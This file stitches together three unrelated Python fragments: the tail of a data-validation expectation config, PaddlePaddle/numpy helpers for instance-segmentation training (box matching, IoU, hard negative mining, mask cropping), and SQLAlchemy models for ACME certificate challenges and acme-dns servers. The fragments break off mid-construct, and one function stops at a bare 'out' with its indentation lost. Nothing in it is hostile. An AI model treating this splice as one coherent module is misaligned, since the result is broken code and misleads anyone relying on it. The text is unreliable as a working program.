"ignore_row_if": "both_values_are_missing",
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": False,
},
},
"expect_column_pair_values_A_to_be_greater_than_B": {
"domain_kwargs": [
"column_A",
"column_B",
"row_condition",
"condition_parser",
],
"success_kwargs": [
"or_equal",
"parse_strings_as_datetimes",
"allow_cross_type_comparisons",
"ignore_row_if",
],
| |
np.random.permutation(np.shape(x)[0])
return perm
def iszero(x):
    """Return True when *x* is empty along its first axis.

    Args:
        x: array-like with at least one dimension (a bare scalar would
           make np.shape(x)[0] raise IndexError, as in the original).
    """
    x = np.array(x)
    # The comparison already yields a bool; no ternary needed.
    return np.shape(x)[0] == 0
def get_cur_pos(cur_pos):
    """Return *cur_pos* as a column vector of shape (n, 1)."""
    as_array = np.array(cur_pos)
    return as_array.reshape((-1, 1))
def center_size(boxes):
    """Convert point-form boxes (xmin, ymin, xmax, ymax) to
    center-size form (cx, cy, w, h).

    Args:
        boxes: (array) point_form boxes, shape [n, 4].
    Return:
        (array) boxes in (cx, cy, w, h) form, shape [n, 4].
    """
    centers = (boxes[:, 2:] + boxes[:, :2]) / 2   # cx, cy
    sizes = boxes[:, 2:] - boxes[:, :2]           # w, h
    return np.concatenate((centers, sizes), 1)
def assign_segment(segment_t, cur_class_t, cur_num, downsampled_masks):
    """Merge per-object masks into a per-class segment map.

    For each of the first *cur_num* objects, the channel for its class
    (class ids are 1-based, hence the -1) is updated with the
    element-wise maximum of itself and the object's mask.
    """
    segment_t = np.array(segment_t)
    cur_class_t = np.array(cur_class_t)
    n_objects = np.array(cur_num)[0]
    downsampled_masks = np.array(downsampled_masks)
    for i in range(n_objects):
        channel = cur_class_t[i] - 1
        segment_t[channel] = np.maximum(segment_t[channel], downsampled_masks[i])
    return segment_t
def get_segment_t_tensor(mask_t, cur_class_t, cur_num, mask_w, mask_h):
    """Build the per-class segmentation target as a fluid tensor.

    Resizes the ground-truth masks to (mask_w, mask_h), binarizes at
    0.5, and scatters them into an 80-channel class map via py_func
    (the numpy helper assign_segment).

    NOTE(review): resize_bilinear's out_shape is documented as [h, w];
    here it is given [mask_w, mask_h] -- confirm the intended order
    (harmless when mask_w == mask_h).
    """
    # Add a batch axis for the bilinear resize, then strip it again.
    downsampled_masks = fluid.layers.squeeze(
        fluid.layers.resize_bilinear(
            fluid.layers.unsqueeze(input=mask_t, axes=[0]),
            out_shape=[mask_w, mask_h],
            align_corners=False),
        axes=[0])
    # Binarize the interpolated masks.
    downsampled_masks = fluid.layers.cast(downsampled_masks > 0.5, 'float32')
    # 80 channels -- presumably one per COCO class; TODO confirm.
    segment_t = fluid.layers.zeros(shape=[80, mask_w, mask_h], dtype='float32')
    # assign_segment (numpy) fills segment_t through the py_func bridge.
    fluid.layers.py_func(func=assign_segment, x=[segment_t, cur_class_t, cur_num, downsampled_masks] ,out=segment_t)
    return segment_t
def get_segment_t(mask_t, cur_class_t, cur_num):
    """numpy implementation of the per-class segmentation target.

    Resizes the first *cur_num* ground-truth masks to 72x72, binarizes
    them at 0.5, and merges each object's mask into the channel of its
    (1-based) class.  80 channels -- presumably COCO; TODO confirm.

    Bug fix: the merge now uses np.maximum (matching assign_segment)
    instead of numpyminmax, whose x*(x>y)+y*(x<y) formulation returns
    0 wherever the operands are equal (e.g. both 1.0), punching holes
    in the target.
    """
    mask_t = np.array(mask_t)
    cur_class_t = np.array(cur_class_t)
    cur_num = np.array(cur_num)[0]
    downsampled_masks = np.zeros((cur_num, 72, 72))
    for idx in range(cur_num):
        temp = mask_t[idx]
        downsampled_masks[idx] = cv2.resize(temp, (72, 72))
    downsampled_masks = (downsampled_masks > 0.5).astype('float32')
    segment_t = np.zeros((80, 72, 72), dtype='float32')
    for obj_idx in range(cur_num):
        segment_t[cur_class_t[obj_idx]-1] = np.maximum(segment_t[cur_class_t[obj_idx]-1], downsampled_masks[obj_idx])
    return segment_t
def get_posneg(conf_data, conf_t, pos):
    """Hard negative mining for the confidence loss (SSD/YOLACT style).

    Keeps all positive priors plus the highest-loss negatives, at most
    negpos_ratio (3) negatives per positive per image.

    Args:
        conf_data: raw class scores; reshaped to (-1, 81), so 81
            classes including background are assumed -- TODO confirm.
        conf_t: per-prior target labels; entries < 0 are neutral.
        pos: boolean [batch, num_priors] mask of positive priors.
    Returns:
        (posneg mask, posneg reshaped to (-1, 1), posneg_idx broadcast
        to conf_data's shape then reshaped to (-1, 1)).
    """
    conf_data = np.array(conf_data)
    batch_size = np.shape(conf_data)[0]
    conf_t = np.array(conf_t)
    pos = np.array(pos)
    # Per-prior classification loss: logsumexp minus the background score.
    batch_conf = np.reshape(conf_data, (-1, 81))
    loss_c = log_sum_exp(batch_conf) - np.reshape(batch_conf[:, 0],(-1,1))
    loss_c = np.reshape(loss_c, (batch_size, -1))
    # Positives and neutral priors can never be selected as hard negatives.
    loss_c[pos] = 0
    loss_c[conf_t < 0] = 0
    # Double argsort: idx_rank[i] is the rank of prior i by descending loss.
    loss_idx = np.argsort(-loss_c, 1)
    idx_rank = np.argsort(loss_idx, 1)
    num_pos = np.sum(pos, 1, keepdims=True)
    negpos_ratio = 3
    # Cap negatives at 3x positives, bounded by the number of priors.
    num_neg = np.clip(negpos_ratio * num_pos, a_min=0, a_max=np.shape(pos)[1]-1)
    neg = idx_rank < np.broadcast_to(num_neg,np.shape(idx_rank))
    neg[pos] = 0
    neg[conf_t < 0] = 0
    # Expand both masks to conf_data's shape for indexing the score tensor.
    pos_idx = np.broadcast_to(np.expand_dims(pos, 2),np.shape(conf_data))
    neg_idx = np.broadcast_to(np.expand_dims(neg, 2),np.shape(conf_data))
    posneg_idx = np.add(pos_idx, neg_idx)
    posneg = np.add(pos, neg)
    posneg_idx = np.reshape(posneg_idx,(-1,1))
    return posneg, np.reshape(posneg,(-1,1)), posneg_idx
def log_sum_exp(x):
    """Numerically stable log(sum(exp(x), axis=1)), keepdims=True.

    The global maximum of x is subtracted before exponentiating to
    avoid overflow, then added back after the log.
    """
    shift = x.max()
    summed = np.exp(x - shift).sum(1, keepdims=True)
    return np.log(summed) + shift
# Module-global timestamp shared by the two timing helpers below.
start_t = 0

def start_time():
    """Record the current timestamp in the module-global start_t."""
    global start_t
    # time.clock() was deprecated in 3.3 and removed in Python 3.8;
    # time.perf_counter() is its documented replacement for intervals.
    start_t = time.perf_counter()

def end_time():
    """Print the elapsed time since the last start_time() call."""
    global start_t
    print('time2', time.perf_counter() - start_t)
def crop_tensor(masks, boxes):
    """fluid counterpart of crop(): zero mask pixels outside each box.

    Args:
        masks: tensor indexed as [h, w, n] (one mask per box, per the
            shape unpacking below) -- TODO confirm layout with callers.
        boxes: [n, 4] boxes in relative point form (x1, y1, x2, y2).
    Returns:
        masks multiplied element-wise by a {0,1} crop mask; no gradient
        flows through the crop mask itself.
    """
    padding = 1
    s = fluid.layers.shape(masks)
    h = fluid.layers.cast(s[0], 'float32')
    w = fluid.layers.cast(s[1], 'float32')
    n = fluid.layers.cast(s[2], 'float32')
    # Relative -> absolute, ordered (x1<=x2) and clipped box bounds.
    x1, x2 = sanitize_coordinates_tensor(boxes[:, 0], boxes[:, 2], w, padding, cast=False)
    y1, y2 = sanitize_coordinates_tensor(boxes[:, 1], boxes[:, 3], h, padding, cast=False)
    # Column/row index grids broadcast to the mask shape.
    rows = fluid.layers.expand_as(fluid.layers.reshape(fluid.layers.range(0, w, 1, 'float32'), shape=(1, -1, 1)), target_tensor=masks)
    cols = fluid.layers.expand_as(fluid.layers.reshape(fluid.layers.range(0, h, 1, 'float32'), shape=(-1, 1, 1)), target_tensor=masks)
    # Four half-plane tests; a pixel is kept when all four hold.
    masks_left = rows >= fluid.layers.reshape(x1, shape=(1,1,-1))
    masks_right = rows < fluid.layers.reshape(x2, shape=(1,1,-1))
    masks_up = cols >= fluid.layers.reshape(y1, shape=(1,1,-1))
    masks_down = cols < fluid.layers.reshape(y2, shape=(1,1,-1))
    masks_left = fluid.layers.cast(masks_left, 'float32')
    masks_right = fluid.layers.cast(masks_right, 'float32')
    masks_up = fluid.layers.cast(masks_up, 'float32')
    masks_down = fluid.layers.cast(masks_down, 'float32')
    crop_mask = masks_left * masks_right * masks_up * masks_down
    # The crop mask is a constant with respect to the loss.
    crop_mask.stop_gradient = True
    return masks * crop_mask
def sanitize_coordinates_tensor(_x1, _x2, img_size, padding:int=0, cast:bool=True, is_mask=True):
    """fluid counterpart of sanitize_coordinates().

    Converts relative coordinates to absolute, orders each pair so
    x1 <= x2, and clips with *padding* slack.  The upper clip bound is
    hard-coded: 138 when is_mask (presumably the prototype mask size)
    and 550 otherwise (presumably the network input size) -- TODO
    confirm both against the model configuration.
    """
    # Relative [0, 1] -> absolute coordinates.
    _x1 = fluid.layers.elementwise_mul(fluid.layers.cast(_x1, 'float32'), img_size)
    _x2 = fluid.layers.elementwise_mul(fluid.layers.cast(_x2, 'float32'), img_size)
    if cast:
        _x1 = fluid.layers.cast(_x1, 'int32')
        _x2 = fluid.layers.cast(_x2, 'int32')
    # Order the pair so x1 <= x2 before clipping.
    x1 = fluid.layers.elementwise_min(_x1, _x2)
    x2 = fluid.layers.elementwise_max(_x1, _x2)
    x1 = fluid.layers.clip(x=x1-padding, min=0, max=10000)
    if is_mask:
        x2 = fluid.layers.clip(x=x2+padding, min=-10000, max=138)
    else:
        x2 = fluid.layers.clip(x=x2+padding, min=-10000, max=550)
    return x1, x2
def crop(masks, boxes):
    """
    "Crop" predicted masks by zeroing out everything not in the predicted bbox.
    Vectorized by Chong (thanks Chong).
    Args:
        - masks should be a size [h, w, n] tensor of masks
        - boxes should be a size [n, 4] tensor of bbox coords in relative point form
    Returns:
        float32 crop mask of shape [h, w, n].  NOTE(review): unlike
        crop_tensor above, this returns only the mask and does not
        multiply by *masks* (only its shape is used) -- presumably the
        caller applies the product; confirm before changing.
    """
    # Fix: removed dead local timestamps (start_time/end_time) that
    # shadowed the module-level timing helpers and were never used.
    padding = 1
    masks = np.array(masks)
    boxes = np.array(boxes)
    h, w, n = np.shape(masks)
    # Relative -> absolute, ordered and clipped box bounds.
    x1, x2 = sanitize_coordinates(boxes[:, 0], boxes[:, 2], w, padding, cast=False)
    y1, y2 = sanitize_coordinates(boxes[:, 1], boxes[:, 3], h, padding, cast=False)
    # Index grids broadcast to [h, w, n] for a vectorized inside-box test.
    rows = np.broadcast_to(np.reshape(np.arange(w, dtype=x1.dtype), (1, -1, 1)), (h, w, n))
    cols = np.broadcast_to(np.reshape(np.arange(h, dtype=x1.dtype), (-1, 1, 1)), (h, w, n))
    masks_left = rows >= np.reshape(x1, (1, 1, -1))
    masks_right = rows < np.reshape(x2, (1, 1, -1))
    masks_up = cols >= np.reshape(y1, (1, 1, -1))
    masks_down = cols < np.reshape(y2, (1, 1, -1))
    # A pixel is inside its box when all four half-plane tests hold.
    crop_mask = masks_left * masks_right * masks_up * masks_down
    return crop_mask.astype('float32')
def sanitize_coordinates(_x1, _x2, img_size:int, padding:int=0, cast:bool=True):
    """
    Sanitizes the input coordinates so that x1 < x2, x1 != x2, x1 >= 0, and x2 <= image_size.
    Also converts from relative to absolute coordinates and casts the results to long tensors.
    If cast is false, the result won't be cast to longs.
    Warning: this does things in-place behind the scenes so copy if necessary.

    Bug fix: uses np.minimum/np.maximum instead of numpyminmax, whose
    x*(x>y)+y*(x<y) formulation returned 0 wherever _x1 == _x2, so
    degenerate boxes collapsed to the origin instead of keeping their
    coordinate.
    """
    # Relative [0, 1] -> absolute pixel coordinates.
    _x1 = _x1 * img_size
    _x2 = _x2 * img_size
    if cast:
        _x1 = _x1.astype('int32')
        _x2 = _x2.astype('int32')
    # Order the pair so x1 <= x2, then clip with the padding slack.
    x1 = np.minimum(_x1, _x2)
    x2 = np.maximum(_x1, _x2)
    x1 = np.clip(x1-padding, a_min=0, a_max=1000000)
    x2 = np.clip(x2+padding, a_min=-1000000, a_max=img_size)
    return x1, x2
def numpyminmax(x, y, Max=True):
    """Element-wise maximum (Max=True) or minimum (Max=False) of x and y.

    Bug fix: the original x*(x>y)+y*(x<y) formulation returned 0
    wherever x == y (both comparisons are False, so both terms vanish).
    np.maximum/np.minimum handle ties correctly and keep the same
    element-wise broadcasting behavior otherwise.
    """
    return np.maximum(x, y) if Max else np.minimum(x, y)
def get_target_tensor(gt_box, priors, gt_class, is_crowd, gt_num, loc_data, batch_size, num_priors):
    """Match priors to ground truth for every image in the batch.

    For each image, match_tensor() produces regression targets (loc),
    per-prior labels (conf: class id, 0 = background, -1 = neutral)
    and the index of the matched gt box; results are stacked along a
    new batch axis.  `is_crowd`, `loc_data` and `num_priors` are
    accepted but unused here -- crowd_boxes is always None.
    """
    loc_t = []
    gt_box_t = []
    conf_t = []
    idx_t = []
    labels = []
    for idx in range(batch_size):
        num = gt_num[idx]
        # Only the first `num` rows of the padded gt arrays are real.
        truths = gt_box[idx, 0:num]
        labels.append(gt_class[idx, 0:num])
        crowd_boxes = None
        pos_threshold = 0.5
        neg_threshold = 0.4
        loc, conf, best_truth_idx = match_tensor(pos_threshold, neg_threshold,
                                                 truths, priors, labels[idx], crowd_boxes,
                                                 loc_t, conf_t, idx_t, idx)
        loc_t.append(loc)
        conf_t.append(conf)
        idx_t.append(best_truth_idx)
        # Gather the matched gt box for every prior of this image.
        gt_box_t.append(fluid.layers.gather(truths, idx_t[idx]))
    loc_t = fluid.layers.stack(loc_t, 0)
    gt_box_t = fluid.layers.stack(gt_box_t, 0)
    conf_t = fluid.layers.stack(conf_t, 0)
    idx_t = fluid.layers.stack(idx_t, 0)
    # Positive priors carry a class label > 0.
    pos = conf_t > 0
    return loc_t, gt_box_t, conf_t, idx_t, pos
def transform_conf(conf, best_truth_overlap):
    """Relabel priors by their best overlap with ground truth.

    Overlap >= 0.5 keeps the matched class label, [0.4, 0.5) becomes
    neutral (-1), and anything below 0.4 becomes background (0).
    """
    conf = np.array(conf)
    best_truth_overlap = np.array(best_truth_overlap)
    pos_thresh, neg_thresh = 0.5, 0.4
    # Order matters: the background write overrides the neutral write
    # for overlaps below neg_thresh.
    conf[best_truth_overlap < pos_thresh] = -1
    conf[best_truth_overlap < neg_thresh] = 0
    return conf.astype('int32')
def assign_labels(overlaps, best_truth_overlap, best_truth_idx):
    """Greedily force-match each ground-truth box to its best prior.

    Repeatedly picks the (gt, prior) pair with the highest remaining
    overlap, pins that prior to that gt with overlap 2 (so it can
    never later be discarded as background), and removes both from
    further consideration by writing -1 into their row/column.
    """
    overlaps = np.array(overlaps)
    best_truth_overlap = np.array(best_truth_overlap)
    best_truth_idx = np.array(best_truth_idx)
    for _ in range(np.shape(overlaps)[0]):
        per_gt_best = overlaps.max(1)
        per_gt_best_prior = overlaps.argmax(1)
        gt = per_gt_best.argmax(0)
        prior = per_gt_best_prior[gt]
        # Exclude this prior and this gt from later iterations.
        overlaps[:, prior] = -1
        overlaps[gt, :] = -1
        best_truth_overlap[prior] = 2
        best_truth_idx[prior] = gt
    return best_truth_overlap, best_truth_idx
def match_tensor(pos_thresh, neg_thresh, truths, priors, labels, crowd_boxes, loc_t, conf_t, idx_t, idx):
    """Match priors to ground-truth boxes for one image (SSD matching).

    Steps: (1) IoU between gt boxes and decoded point-form priors;
    (2) best gt per prior via descending argsort (row 0); (3) force
    matches through py_func(assign_labels); (4) threshold labels into
    {class, 0, -1} through py_func(transform_conf); (5) encode
    regression targets.  `crowd_boxes`, `loc_t`, `conf_t`, `idx_t`
    and `idx` are accepted but unused in this implementation; the
    thresholds actually applied are the ones inside transform_conf.
    Returns (loc targets, conf labels, best_truth_idx).
    """
    use_yolo_regressors = False
    decoded_priors = point_form_tensor(priors)
    #shape:[gt_num, num_priors]
    overlaps = jaccard_tensor(truths, decoded_priors)
    # argsort returns (sorted values, indices); row 0 of each holds the
    # best gt overlap/index for every prior.
    best_truth_overlap, best_truth_idx = fluid.layers.argsort(overlaps, 0, descending=True)
    best_truth_overlap = best_truth_overlap[0]
    best_truth_idx = best_truth_idx[0]
    fluid.layers.py_func(func=assign_labels, x=[overlaps, best_truth_overlap, best_truth_idx] ,out=[best_truth_overlap, best_truth_idx])
    matches = fluid.layers.gather(truths, best_truth_idx)
    conf = fluid.layers.gather(labels, best_truth_idx)
    fluid.layers.py_func(func=transform_conf, x=[conf, best_truth_overlap] ,out=conf)
    loc = encode_tensor(matches, priors, use_yolo_regressors)
    return loc, conf, best_truth_idx
def decode(loc, priors):
    """Decode predicted offsets against priors (SSD box coding).

    priors are (cx, cy, w, h); loc holds offsets scaled by the
    variances [0.1, 0.2].  The decoded centers/sizes are converted to
    point form (xmin, ymin, xmax, ymax) in place before returning.
    """
    variances = [0.1, 0.2]
    centers = priors[:, :2] + loc[:, :2] * variances[0] * priors[:, 2:]
    sizes = priors[:, 2:] * np.exp(loc[:, 2:] * variances[1])
    boxes = np.concatenate([centers, sizes], 1)
    # (cx, cy, w, h) -> (xmin, ymin, xmax, ymax).
    boxes[:, :2] -= boxes[:, 2:] / 2
    boxes[:, 2:] += boxes[:, :2]
    return boxes
def encode_tensor(matched, priors, use_yolo_regressors:bool=False):
    """Encode matched gt boxes (point form) against priors (center-size)
    into SSD regression targets with variances [0.1, 0.2].

    `use_yolo_regressors` is accepted for interface parity but unused
    in this implementation.
    """
    variances = [0.1, 0.2]
    # dist b/t match center and prior's center
    g_cxcy = (matched[:, :2] + matched[:, 2:])/2.0 - priors[:, :2]
    # encode variance
    g_cxcy /= (variances[0] * priors[:, 2:])
    # match wh / prior wh
    g_wh = (matched[:, 2:] - matched[:, :2]) / priors[:, 2:]
    g_wh = fluid.layers.log(g_wh) / variances[1]
    # return target for smooth_l1_loss
    loc = fluid.layers.concat([g_cxcy, g_wh], 1)  # [num_priors,4]
    return loc
def jaccard_tensor_3D(box_a, box_b, iscrowd:bool=False):
    """Batched IoU between two sets of point-form boxes.

    Args:
        box_a: [batch, A, 4]; box_b: [batch, B, 4] (per the indexing
            below).
        iscrowd: when True, divide the intersection by area_a only
            (crowd-annotation convention) instead of the union.
    Returns:
        [batch, A, B] overlap matrix (use_batch is hard-wired True, so
        the squeeze branch is currently dead).
    """
    use_batch = True
    A = fluid.layers.shape(box_a)[1]
    B = fluid.layers.shape(box_b)[1]
    inter = intersect_tensor(box_a, box_b)
    # Per-box areas broadcast to [batch, A, B].
    area_a = fluid.layers.expand(fluid.layers.unsqueeze(((box_a[:, :, 2]-box_a[:, :, 0]) *
                                                         (box_a[:, :, 3]-box_a[:, :, 1])),2), [1, 1, B])
    area_b = fluid.layers.expand(fluid.layers.unsqueeze(((box_b[:, :, 2]-box_b[:, :, 0]) *
                                                         (box_b[:, :, 3]-box_b[:, :, 1])),1), [1, A, 1])
    union = area_a + area_b - inter
    out = inter / (area_a) if iscrowd else inter / (union)
    return out if use_batch else fluid.layers.squeeze(out, [0])
def jaccard_tensor(box_a, box_b, iscrowd:bool=False):
use_batch = False
box_a = fluid.layers.unsqueeze(box_a, [0])
box_b = fluid.layers.unsqueeze(box_b, [0])
A = fluid.layers.shape(box_a)[1]
B = fluid.layers.shape(box_b)[1]
inter = intersect_tensor(box_a, box_b)
area_a = fluid.layers.expand(fluid.layers.unsqueeze(((box_a[:, :, 2]-box_a[:, :, 0]) *
(box_a[:, :, 3]-box_a[:, :, 1])),2), [1, 1, B])
area_b = fluid.layers.expand(fluid.layers.unsqueeze(((box_b[:, :, 2]-box_b[:, :, 0]) *
(box_b[:, :, 3]-box_b[:, :, 1])),1), [1, A, 1])
union = area_a + area_b - inter
out | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# NOTE(review): disabled relationship kept for reference.
# acme_event_log = sa_orm_relationship(
#     "AcmeEventLog",
#     primaryjoin="AcmeChallenge.acme_event_log_id==AcmeEventLog.id",
#     uselist=False,
#     back_populates="acme_challenges",
# )
# Poll log entries recorded against this challenge.
acme_challenge_polls = sa_orm_relationship(
    "AcmeChallengePoll",
    primaryjoin="AcmeChallenge.id==AcmeChallengePoll.acme_challenge_id",
    uselist=True,
    back_populates="acme_challenge",
)
# Owning AcmeAuthorization, if any.  `overlaps` silences SQLAlchemy's
# warning about the per-type challenge relationships sharing columns.
acme_authorization = sa_orm_relationship(
    "AcmeAuthorization",
    primaryjoin="AcmeChallenge.acme_authorization_id==AcmeAuthorization.id",
    uselist=False,
    back_populates="acme_challenges",
    overlaps="acme_challenge_dns_01,acme_challenge_http_01,acme_challenge_tls_alpn_01",
)
# Owning AcmeOrderless container, if any.
acme_orderless = sa_orm_relationship(
    "AcmeOrderless",
    primaryjoin="AcmeChallenge.acme_orderless_id==AcmeOrderless.id",
    uselist=False,
    back_populates="acme_challenges",
)
# The Domain this challenge answers for.
domain = sa_orm_relationship(
    "Domain",
    primaryjoin="AcmeChallenge.domain_id==Domain.id",
    uselist=False,
    back_populates="acme_challenges",
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@property
def acme_challenge_type(self):
    """String form of acme_challenge_type_id, or None when unset."""
    type_id = self.acme_challenge_type_id
    if not type_id:
        return None
    return model_utils.AcmeChallengeType.as_string(type_id)
@property
def acme_status_challenge(self):
    """String form of this challenge's ACME status id."""
    status_id = self.acme_status_challenge_id
    return model_utils.Acme_Status_Challenge.as_string(status_id)
@property
def domain_name(self):
    """Convenience passthrough to the related Domain's name."""
    related_domain = self.domain
    return related_domain.domain_name
@property
def challenge_instructions_short(self):
    """One-line, human-readable note on whether this install can
    answer the challenge, keyed off the challenge type."""
    challenge_type = self.acme_challenge_type
    if challenge_type == "http-01":
        return "PeterSSLers is configured to answer this challenge."
    if challenge_type == "dns-01":
        return "This challenge may require DNS configuration."
    return "PeterSSLers can not answer this challenge."
@property
def is_can_acme_server_sync(self):
    """True when this challenge can be synced against the ACME server.

    Requires both a challenge_url and an authorization (the auth's
    order_id is needed for the AcmeAccount).
    """
    if self.challenge_url and self.acme_authorization_id:
        return True
    return False
@property
def is_can_acme_server_trigger(self):
    """True when this challenge may be triggered on the ACME server:
    it needs a challenge_url, an authorization (the auth's order_id is
    needed for the AcmeAccount) and a triggerable status."""
    if not self.challenge_url:
        return False
    if not self.acme_authorization_id:
        return False
    status = self.acme_status_challenge
    return status in model_utils.Acme_Status_Challenge.OPTIONS_TRIGGER
@property
def is_configured_to_answer(self):
    """True when this challenge is both triggerable and one this
    install can actually answer (http-01 always; dns-01 only with an
    active acme-dns account on the domain)."""
    if not self.is_can_acme_server_trigger:
        return False
    challenge_type = self.acme_challenge_type
    if challenge_type == "http-01":
        return True
    if challenge_type == "dns-01" and self.domain.acme_dns_server_account__active:
        return True
    return False
@property
def as_json(self):
    """JSON-serializable summary of this challenge for the admin API."""
    dbSession = sa_Session.object_session(self)
    request = dbSession.info["request"]
    admin_url = request.admin_url if request else ""
    # The action URLs are only exposed when the action is possible.
    url_sync = None
    if self.is_can_acme_server_sync:
        url_sync = "%s/acme-challenge/%s/acme-server/sync.json" % (admin_url, self.id)
    url_trigger = None
    if self.is_can_acme_server_trigger:
        url_trigger = "%s/acme-challenge/%s/acme-server/trigger.json" % (admin_url, self.id)
    return {
        "id": self.id,
        "acme_challenge_type": self.acme_challenge_type,
        "acme_status_challenge": self.acme_status_challenge,
        "domain": {
            "id": self.domain_id,
            "domain_name": self.domain.domain_name,
        },
        "keyauthorization": self.keyauthorization,
        "timestamp_created": self.timestamp_created_isoformat,
        "timestamp_updated": self.timestamp_updated_isoformat,
        "token": self.token,
        "url_acme_server_sync": url_sync,
        "url_acme_server_trigger": url_trigger,
        # "acme_event_log_id": self.acme_event_log_id,
    }
# ==============================================================================
class AcmeChallengeCompeting(Base, _Mixin_Timestamps_Pretty):
    """Tracks an edge case: a group of competing ACME challenges,
    optionally tied to a Domain (domain_id is nullable)."""

    # This is for tracking an EdgeCase
    __tablename__ = "acme_challenge_competing"
    id = sa.Column(sa.Integer, primary_key=True)
    timestamp_created = sa.Column(sa.DateTime, nullable=False)
    domain_id = sa.Column(sa.Integer, sa.ForeignKey("domain.id"), nullable=True)

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    domain = sa_orm_relationship(
        "Domain",
        primaryjoin="AcmeChallengeCompeting.domain_id==Domain.id",
        uselist=False,
    )
    # The association rows linking this record to its challenges.
    acme_challenge_competing_2_acme_challenge = sa_orm_relationship(
        "AcmeChallengeCompeting2AcmeChallenge",
        primaryjoin=(
            "AcmeChallengeCompeting.id==AcmeChallengeCompeting2AcmeChallenge.acme_challenge_competing_id"
        ),
        uselist=True,
        back_populates="acme_challenge_competing",
    )
class AcmeChallengeCompeting2AcmeChallenge(Base, _Mixin_Timestamps_Pretty):
    """Association row linking an AcmeChallengeCompeting record to one
    of its AcmeChallenges (composite primary key)."""

    __tablename__ = "acme_challenge_competing_2_acme_challenge"
    acme_challenge_competing_id = sa.Column(
        sa.Integer, sa.ForeignKey("acme_challenge_competing.id"), primary_key=True
    )
    acme_challenge_id = sa.Column(
        sa.Integer, sa.ForeignKey("acme_challenge.id"), primary_key=True
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    acme_challenge_competing = sa_orm_relationship(
        "AcmeChallengeCompeting",
        primaryjoin=(
            "AcmeChallengeCompeting2AcmeChallenge.acme_challenge_competing_id==AcmeChallengeCompeting.id"
        ),
        uselist=False,
        back_populates="acme_challenge_competing_2_acme_challenge",
    )
    acme_challenge = sa_orm_relationship(
        "AcmeChallenge",
        primaryjoin=(
            "AcmeChallengeCompeting2AcmeChallenge.acme_challenge_id==AcmeChallenge.id"
        ),
        uselist=False,
    )
# ==============================================================================
class AcmeChallengePoll(Base, _Mixin_Timestamps_Pretty):
    """
    log ACME Challenge polls
    """

    __tablename__ = "acme_challenge_poll"
    id = sa.Column(sa.Integer, primary_key=True)
    # The challenge that was polled.
    acme_challenge_id = sa.Column(
        sa.Integer, sa.ForeignKey("acme_challenge.id"), nullable=False
    )
    timestamp_polled = sa.Column(sa.DateTime, nullable=False)
    # The source IP, normalized into the remote_ip_address table.
    remote_ip_address_id = sa.Column(
        sa.Integer, sa.ForeignKey("remote_ip_address.id"), nullable=False
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    acme_challenge = sa_orm_relationship(
        "AcmeChallenge",
        primaryjoin="AcmeChallengePoll.acme_challenge_id==AcmeChallenge.id",
        uselist=False,
        back_populates="acme_challenge_polls",
    )
    remote_ip_address = sa_orm_relationship(
        "RemoteIpAddress",
        primaryjoin="AcmeChallengePoll.remote_ip_address_id==RemoteIpAddress.id",
        uselist=False,
        back_populates="acme_challenge_polls",
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    @property
    def as_json(self):
        """JSON-serializable summary of this poll record."""
        return {
            "id": self.id,
            "AcmeChallenge": self.acme_challenge.as_json,
            "timestamp_polled": self.timestamp_polled_isoformat,
            "remote_ip_address": {
                "id": self.remote_ip_address_id,
                "ip_address": self.remote_ip_address.remote_ip_address,
            },
        }
# ==============================================================================
class AcmeChallengeUnknownPoll(Base, _Mixin_Timestamps_Pretty):
    """
    log polls of non-existent ACME challenges
    """

    __tablename__ = "acme_challenge_unknown_poll"
    id = sa.Column(sa.Integer, primary_key=True)
    # Raw domain and challenge strings -- there is no matching
    # AcmeChallenge row, so no foreign keys are possible here.
    domain = sa.Column(sa.Unicode(255), nullable=False)
    challenge = sa.Column(sa.Unicode(255), nullable=False)
    timestamp_polled = sa.Column(sa.DateTime, nullable=False)
    remote_ip_address_id = sa.Column(
        sa.Integer, sa.ForeignKey("remote_ip_address.id"), nullable=False
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    remote_ip_address = sa_orm_relationship(
        "RemoteIpAddress",
        primaryjoin="AcmeChallengeUnknownPoll.remote_ip_address_id==RemoteIpAddress.id",
        uselist=False,
        back_populates="acme_challenge_unknown_polls",
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    @property
    def as_json(self):
        """JSON-serializable summary of this poll record."""
        return {
            "id": self.id,
            "domain": self.domain,
            "challenge": self.challenge,
            "timestamp_polled": self.timestamp_polled_isoformat,
            "remote_ip_address": {
                "id": self.remote_ip_address_id,
                "ip_address": self.remote_ip_address.remote_ip_address,
            },
        }
# ==============================================================================
class AcmeDnsServer(Base, _Mixin_Timestamps_Pretty):
    """A DNS server (presumably an acme-dns instance, per the account
    relationship below) this installation can provision accounts on."""

    __tablename__ = "acme_dns_server"
    id = sa.Column(sa.Integer, primary_key=True)
    timestamp_created = sa.Column(sa.DateTime, nullable=False)
    is_active = sa.Column(sa.Boolean, nullable=False, default=True)
    # Nullable so "not default" is NULL rather than False -- presumably
    # to support a uniqueness scheme on the single default; TODO confirm.
    is_global_default = sa.Column(sa.Boolean, nullable=True, default=None)
    root_url = sa.Column(sa.Unicode(255), nullable=False)
    operations_event_id__created = sa.Column(
        sa.Integer, sa.ForeignKey("operations_event.id"), nullable=False
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    acme_dns_server_accounts = sa_orm_relationship(
        "AcmeDnsServerAccount",
        primaryjoin="AcmeDnsServer.id==AcmeDnsServerAccount.acme_dns_server_id",
        uselist=True,
        back_populates="acme_dns_server",
    )
    operations_event__created = sa_orm_relationship(
        "OperationsEvent",
        primaryjoin="AcmeDnsServer.operations_event_id__created==OperationsEvent.id",
        uselist=False,
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    @property
    def as_json(self):
        """JSON-serializable summary; booleans are normalized to True/False."""
        return {
            "id": self.id,
            "root_url": self.root_url,
            "timestamp_created": self.timestamp_created_isoformat,
            "is_active": True if self.is_active else False,
            "is_global_default": True if self.is_global_default else False,
        }
# ==============================================================================
